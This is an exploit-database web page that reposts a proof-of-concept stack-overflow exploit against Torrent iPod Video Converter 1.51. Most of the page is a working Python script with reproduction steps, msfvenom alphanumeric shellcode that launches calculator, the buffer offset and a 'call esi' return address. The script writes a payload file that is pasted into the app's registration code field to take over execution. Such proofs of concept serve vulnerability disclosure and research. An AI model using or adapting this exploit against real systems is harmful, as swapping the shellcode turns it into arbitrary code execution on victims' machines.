Registertorrent ipod video converter 1.51 stack overflow
▸▸▸ Exploit & Vulnerability >> local exploit & windows vulnerability
Online Vulnerability Scanner Tools
Code...
# Exploit Title: Torrent iPod Video Converter 1.51 - Stack Overflow # Exploit Author: boku # Date: 2020-02-10 # Software Vendor: torrentrockyou # Vendor Homepage: http://www.torrentrockyou.com # Software Link: http://www.torrentrockyou.com/download/tripodconverter.exe # Version: Torrent iPod Video Converter Version 1.51 Build 115 # Tested On: Windows 10 Pro (x86) 10.0.18363 Build 18363 # Recreate: # 1) Download, install, and open Torrent iPod Video Converter # 2) run python script & open created 'poc.txt' file # 3) select-all > copy-all # 4) in app, click 'Register' on the bottom # 5) in 'Name:' textbox enter 'a' # 6) in 'Code:' textbox paste buffer # 7) click 'OK', calculator will open & app will crash # ghoul@theZiggurat# msfvenom -p windows/exec CMD=calc EXITFUNC=seh --encoder x86/alpha_upper -v shellcode -f python # x86/alpha_upper chosen with final size 447 # the decoder stubs GetPC routine includes bad characters. ESI is already at PC so no need to find it. Just remove the GetPC routine in the stub. #shellcode = b"\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" # echo -ne "\x89\xe7\xda\xdc\xd9\x77\xf4\x5d\x55\x59\x49" | ndisasm - # 89E7 mov di,sp # DADC fcmovu st4 # D977F4 fnstenv [bx-0xc] # 5D pop bp # 55 push bp # 59 pop cx # 49 dec cx shellcode = b'\x54\x5f' # push esp # pop edi shellcode += b'\x56\x59' # push esi # pop ecx shellcode += b'\x41\x90' # inc ecx # nop # Fix the offset for GetPC shellcode += b'\x90\x90\x90\x90\x90' # keep the byte length the same shellcode += b"\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a" shellcode += b"\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30" shellcode += b"\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41" shellcode += b"\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42" shellcode += b"\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a" shellcode += b"\x49\x4b\x4c\x5a\x48\x4d\x52\x45\x50\x35\x50" shellcode += b"\x45\x50\x35\x30\x4c\x49\x4a\x45\x50\x31\x39" shellcode += b"\x50\x33\x54\x4c\x4b\x36\x30\x30\x30\x4c\x4b" shellcode += b"\x36\x32\x54\x4c\x4c\x4b\x50\x52\x32\x34\x4c" shellcode += b"\x4b\x53\x42\x31\x38\x44\x4f\x38\x37\x50\x4a" shellcode += b"\x57\x56\x30\x31\x4b\x4f\x4e\x4c\x37\x4c\x43" shellcode += b"\x51\x43\x4c\x54\x42\x36\x4c\x57\x50\x39\x51" shellcode += b"\x48\x4f\x34\x4d\x43\x31\x49\x57\x4d\x32\x4c" shellcode += b"\x32\x36\x32\x31\x47\x4c\x4b\x56\x32\x44\x50" shellcode += b"\x4c\x4b\x51\x5a\x47\x4c\x4c\x4b\x30\x4c\x44" shellcode += b"\x51\x43\x48\x5a\x43\x57\x38\x43\x31\x48\x51" shellcode += b"\x46\x31\x4c\x4b\x31\x49\x57\x50\x35\x51\x59" shellcode += b"\x43\x4c\x4b\x30\x49\x34\x58\x4d\x33\x57\x4a" shellcode += b"\x50\x49\x4c\x4b\x36\x54\x4c\x4b\x43\x31\x58" shellcode += b"\x56\x30\x31\x4b\x4f\x4e\x4c\x39\x51\x38\x4f" shellcode += b"\x54\x4d\x55\x51\x39\x57\x47\x48\x4b\x50\x54" shellcode += b"\x35\x4c\x36\x45\x53\x53\x4d\x4c\x38\x47\x4b" shellcode += b"\x43\x4d\x47\x54\x43\x45\x4d\x34\x51\x48\x4c" shellcode += b"\x4b\x50\x58\x37\x54\x43\x31\x4e\x33\x53\x56" shellcode += b"\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x30\x58\x45" shellcode += b"\x4c\x55\x51\x49\x43\x4c\x4b\x43\x34\x4c\x4b" shellcode += b"\x33\x31\x38\x50\x4d\x59\x50\x44\x57\x54\x31" shellcode += b"\x34\x51\x4b\x51\x4b\x45\x31\x30\x59\x31\x4a" shellcode += b"\x50\x51\x4b\x4f\x4d\x30\x31\x4f\x31\x4f\x51" shellcode += b"\x4a\x4c\x4b\x35\x42\x5a\x4b\x4c\x4d\x31\x4d" shellcode += b"\x52\x4a\x45\x51\x4c\x4d\x4d\x55\x4f\x42\x45" shellcode += b"\x50\x55\x50\x35\x50\x56\x30\x45\x38\x56\x51" shellcode += b"\x4c\x4b\x42\x4f\x4c\x47\x4b\x4f\x4e\x35\x4f" shellcode += b"\x4b\x4b\x4e\x44\x4e\x37\x42\x4a\x4a\x45\x38" shellcode += b"\x4f\x56\x4d\x45\x4f\x4d\x4d\x4d\x4b\x4f\x59" shellcode += b"\x45\x37\x4c\x43\x36\x33\x4c\x34\x4a\x4d\x50" shellcode += b"\x4b\x4b\x4b\x50\x34\x35\x35\x55\x4f\x4b\x37" shellcode += b"\x37\x34\x53\x43\x42\x42\x4f\x53\x5a\x35\x50" shellcode += b"\x56\x33\x4b\x4f\x4e\x35\x32\x43\x35\x31\x52" shellcode += b"\x4c\x52\x43\x33\x30\x41\x41" EIP_OS = '\x41'*(4136-len(shellcode)) EIP = '\x5a\x32\x4f' # 0x004f325a : call esi {PAGE_EXECUTE_READWRITE} [bsvideoconverter.exe] # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.2.8.1 (C:\Program Files\Torrent IPOD Video Converter\bsvideoconverter.exe) payload = shellcode + EIP_OS + EIP try: f=open("poc.txt","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!") except: print("File cannot be created.")
Torrent ipod video converter 1.51 stack overflow Vulnerability / Exploit Source : Torrent ipod video converter 1.51 stack overflow
Last Vulnerability or Exploits
Easy integrations and simple setup help you start scanning in just some minutes